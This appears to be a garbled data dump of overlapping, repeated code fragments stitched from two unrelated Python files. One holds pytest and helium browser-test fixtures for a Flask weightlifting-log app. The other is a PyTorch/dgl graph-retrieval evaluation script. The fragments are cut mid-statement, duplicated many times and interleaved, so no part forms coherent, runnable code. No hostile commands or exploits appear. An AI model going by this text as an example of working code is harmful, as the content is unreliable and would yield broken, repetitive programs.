import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\"", "TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False", "@pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login():", "driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\",", "= start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver = start_firefox(HOME_PAGE, headless=True)", "Create the database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\",", "def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def driver_login(): driver", "= app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): #", "= \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\"", "import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4", "User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens", "import User from strength_log import create_app, db from strength_log.config import Config from helium", "strength_log import create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser,", "helium import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class", "into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\",", "from strength_log import create_app, db from strength_log.config import Config from helium import start_firefox,", "start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING", "database and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2", "user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes", "kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING =", "ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables", "app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop()", "4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE,", "testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database():", "@pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push()", "click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user", "@pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() # Insert user", "= True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def", "False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser() @pytest.fixture def", "password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db # Testing happpens here", "strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write import pytest", "user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit() yield db #", "create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def", "start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def", "= app.app_context() ctx.push() yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database", "db from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link, write", "import start_firefox, kill_browser, click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config):", "kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client():", "= User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client =", "click, Link, write import pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True", "\"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx", "yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\")", "pytest HOME_PAGE = \"https://www.strengthlog.app/\" class TestConfig(Config): TESTING = True BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI", "yield testing_client ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all()", "create_app, db from strength_log.config import Config from helium import start_firefox, kill_browser, click, Link,", "\"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver", "driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver", "and tables db.create_all() # Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 =", "ctx.pop() @pytest.fixture(scope=\"module\") def init_database(): # Create the database and tables db.create_all() # Insert", "def driver_login(): driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield", "@pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def test_client(): app", "= User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1) db.session.add(user2) # Commit changes db.session.commit()", "driver = start_firefox(HOME_PAGE, headless=True) click(Link(\"Login\")) write(\"<EMAIL>\", into=\"Email\") write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser()", "= 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver =", "BCRYPT_LOG_ROUNDS = 4 SQLALCHEMY_DATABASE_URI = \"sqlite://\" WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver", "write(\"test\", into=\"Password\") click(\"Submit\") yield driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\")", "user @pytest.fixture(scope=\"module\") def test_client(): app = create_app(config_class=TestConfig) testing_client = app.test_client() ctx = app.app_context()", "driver kill_browser() @pytest.fixture(scope=\"module\") def new_user(): user = User(\"<EMAIL>\", \"strengthlog\") return user @pytest.fixture(scope=\"module\") def", "WTF_CSRF_ENABLED = False @pytest.fixture def driver_home(): driver = start_firefox(HOME_PAGE, headless=True) yield driver kill_browser()", "# Insert user data user1 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") user2 = User(email=\"<EMAIL>\", password=\"<PASSWORD>\") db.session.add(user1)" ]
[ "criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if", "loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def", "target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query)))", "# Check cuda & Set random seed args.cuda = args.ngpu > 0 and", "import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader,", "kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN", "meanap = LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval()", "= checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader,", "Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if", "# mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg:", "if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise", "mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap", "Check Test and Load if args.load is None: raise Exception('Cannot test without loading", "TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion", "dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] =", "np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is", "TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(),", "# Own modules from options import Options from Logger import LogMetric from utils", "{b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if", "g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = []", "and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__':", "i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values #", "# Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix", "print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True", "early_stop_counter = 0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load)", "print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0", "= list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query", "from models import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss,", "g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'],", "division \"\"\" Graph classification \"\"\" # Python modules import torch import glob import", "import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from", "if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net =", "np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std':", "LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval() distance.eval() end", "[] for j, (g, target) in enumerate(gallery_loader): if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda()", "dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query)", "= args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check", "print('Parameters:\\t' + str(args)) # Check cuda & Set random seed args.cuda = args.ngpu", "net, distance = nets # switch to test mode net.eval() distance.eval() end =", "= checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map']))", "= TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False", "str(args)) # Check cuda & Set random seed args.cuda = args.ngpu > 0", "Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models,", "time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery", "= net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter", "checkpoint['best_map'] print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net,", "mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query =", "= 0 if args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict'])", "args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True)", "enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output", "triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet", "net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if", "target) in enumerate(data_loader): # Prepare input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda()", "= LogMetric.AverageMeter() net, distance = nets # switch to test mode net.eval() distance.eval()", "torch.cuda.manual_seed(args.seed) # Check Test and Load if args.load is None: raise Exception('Cannot test", "g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g,", "k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP", "numpy as np import time import os # Own modules from options import", "distNet], args.cuda) if __name__ == '__main__': # Parse options args = Options().parse() print('Parameters:\\t'", "& Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion", "net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch = 0 best_map =", "target_gallery = np.array(np.concatenate(target_gallery)) gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata", "TripletLoss import dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets,", "import glob import numpy as np import time import os # Own modules", "= criterion.cuda() start_epoch = 0 best_map = 0 early_stop_counter = 0 if args.load", "<gh_stars>1-10 # -*- coding: utf-8 -*- from __future__ import print_function, division \"\"\" Graph", "gdata = list(map(lambda g: g.gdata['std'], g_gallery)) g_gallery = dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)}", "Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net,", "\"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter()", "LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models import models, distance from", "batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets", "def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif", "torch import glob import numpy as np import time import os # Own", "valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model')", "and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu)))", "target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind", "torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i]", "time import os # Own modules from options import Options from Logger import", "np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw", "combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for", "[] for i, (g, target) in enumerate(data_loader): # Prepare input data if cuda:", "target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test", "= dist_matrix else: print('* Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query =", "import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\" __email__", "cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery", "print('Loaded model at epoch {epoch} and mAP {meanap}%'.format(epoch=checkpoint['epoch'],meanap=checkpoint['best_map'])) print('***Test***') test(test_loader, test_gallery_loader, [net, distNet],", "= torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw == target_query", "args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu", "model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded", "in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier", "-*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python modules", "as np import time import os # Own modules from options import Options", "models import models, distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss", "+ str(args)) # Check cuda & Set random seed args.cuda = args.ngpu >", "distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation:", "cuda & Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed)", "from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ =", "Test No combine mAP {}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0],", "test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net =", "not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map", "random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda:", "target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query):", "test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch) print('Create model') net = models.GNN(in_size,", "g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g) target_gallery =", ".format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet':", "CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net", "args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare", "best_map = 0 early_stop_counter = 0 if args.load is not None: print('Loading model')", "[net, distNet], args.cuda) if __name__ == '__main__': # Parse options args = Options().parse()", "print('* Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap,", "distance.eval() end = time.time() dist_matrix = [] start = time.time() with torch.no_grad(): g_gallery", "acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test", "Test and Load if args.load is None: raise Exception('Cannot test without loading a", "options import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision", "args.load is not None: print('Loading model') checkpoint = load_checkpoint(args.load) net.load_state_dict(checkpoint['state_dict']) distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch =", "K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start)", "[] start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for", "dgl __author__ = \"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False):", "g.gdata['std'].cuda() # Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target)", "= net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query", "for i, kw in enumerate(target_combined_query): ind = kw == target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values", "print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**')", "d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix = torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query))", "time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j, (g, target)", "meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap)", "acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to", "dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader,", "combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw in enumerate(target_combined_query): ind = kw ==", "Python modules import torch import glob import numpy as np import time import", "J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and args.ngpu > 1: print('\\t*", "cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) d = distance(g,", "**NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet =", "cuda, validation=False): batch_time = LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance", "elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin)", "validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else: print('* Test No combine mAP", "from options import Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy,", "Output g = net(g) d = distance(g, g_gallery, mode='retrieval') dist_matrix.append(d) target_query.append(target) dist_matrix =", "torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix else:", "if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g) target_gallery.append(target) g_gallery.append(g)", "Check cuda & Set random seed args.cuda = args.ngpu > 0 and torch.cuda.is_available()", "\"<NAME>\" __email__ = \"<EMAIL>\" def test(data_loader, gallery_loader, nets, cuda, validation=False): batch_time = LogMetric.AverageMeter()", "# Python modules import torch import glob import numpy as np import time", "Test Acc {acc.avg:.3f}; mAP {meanap.avg: .5f} Time x Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time))", "dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery,", "target_query = [] for i, (g, target) in enumerate(data_loader): # Prepare input data", "distance from data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__", "target_query combined_dist_matrix[i] = dist_matrix[ind].min(0).values # K-NN classifier acc.update(knn_accuracy(combined_dist_matrix, target_gallery, target_combined_query, k=5)) # mAP", "data.load_data import load_data from loss.contrastive import ContrastiveLoss, TripletLoss import dgl __author__ = \"<NAME>\"", "to test mode net.eval() distance.eval() end = time.time() dist_matrix = [] start =", "args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data')", "distNet.load_state_dict(checkpoint['state_dict_dist']) start_epoch = checkpoint['epoch'] best_map = checkpoint['best_map'] print('Loaded model at epoch {epoch} and", "models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA') if args.cuda and", "> 0 and torch.cuda.is_available() np.random.seed(args.seed) torch.manual_seed(args.seed) if args.cuda: torch.cuda.manual_seed(args.seed) # Check Test and", "{}'.format(mean_average_precision(dist_matrix, target_gallery, target_query))) target_combined_query = np.unique(target_query) combined_dist_matrix = torch.zeros(target_combined_query.shape[0], dist_matrix.shape[1]) for i, kw", "model') net = models.GNN(in_size, args.out_size, nlayers=args.nlayers, hid=args.hidden, J=args.pow) distNet = distance.SoftHd() print('Check CUDA')", "Options from Logger import LogMetric from utils import load_checkpoint, knn_accuracy, mean_average_precision from models", "criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap, dist=True) else:", "Test {b_time.avg:.3f}' .format(acc=acc, meanap=meanap, b_time=batch_time)) return acc, meanap def main(): print('Loss & Optimizer')", "start = time.time() with torch.no_grad(): g_gallery = [] target_gallery = [] for j,", "# Check Test and Load if args.load is None: raise Exception('Cannot test without", "dgl.batch(g_gallery) g_gallery.gdata = {'std': torch.cat(gdata)} target_query = [] for i, (g, target) in", "main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion = TripletLoss(margin=args.margin, swap=args.swap) elif args.loss=='triplet_distance':", "input data if cuda: g.to(torch.device('cuda')) g.gdata['std'] = g.gdata['std'].cuda() # Output g = net(g)", "= torch.stack(dist_matrix) target_query = np.array(np.concatenate(target_query)) if validation: target_combined_query = target_query combined_dist_matrix = dist_matrix", "return acc, meanap def main(): print('Loss & Optimizer') if args.loss=='triplet': args.triplet=True criterion =", "= TripletLoss(margin=args.margin, swap=args.swap, dist=True) else: args.triplet=False criterion = ContrastiveLoss(margin=args.margin) print('Prepare data') train_loader, valid_loader,", "test(test_loader, test_gallery_loader, [net, distNet], args.cuda) if __name__ == '__main__': # Parse options args", "LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch to test mode", "utf-8 -*- from __future__ import print_function, division \"\"\" Graph classification \"\"\" # Python", "nets # switch to test mode net.eval() distance.eval() end = time.time() dist_matrix =", "target_combined_query, k=5)) # mAP retrieval meanap.update(mean_average_precision(combined_dist_matrix, target_gallery, target_combined_query)) batch_time.update(time.time()-start) print('* Test Acc {acc.avg:.3f};", "= torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion", "LogMetric.AverageMeter() acc = LogMetric.AverageMeter() meanap = LogMetric.AverageMeter() net, distance = nets # switch", "1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t*", "args.cuda and args.ngpu > 1: print('\\t* Data Parallel **NOT TESTED**') net = torch.nn.DataParallel(net,", "data') train_loader, valid_loader, valid_gallery_loader, test_loader, test_gallery_loader, in_size = load_data(args.dataset, args.data_path, triplet=args.triplet, batch_size=args.batch_size, prefetch=args.prefetch)", "if args.cuda: print('\\t* CUDA') net, distNet = net.cuda(), distNet.cuda() criterion = criterion.cuda() start_epoch", "Parallel **NOT TESTED**') net = torch.nn.DataParallel(net, device_ids=list(range(args.ngpu))) if args.cuda: print('\\t* CUDA') net, distNet", "= distance.SoftHd() print('Check 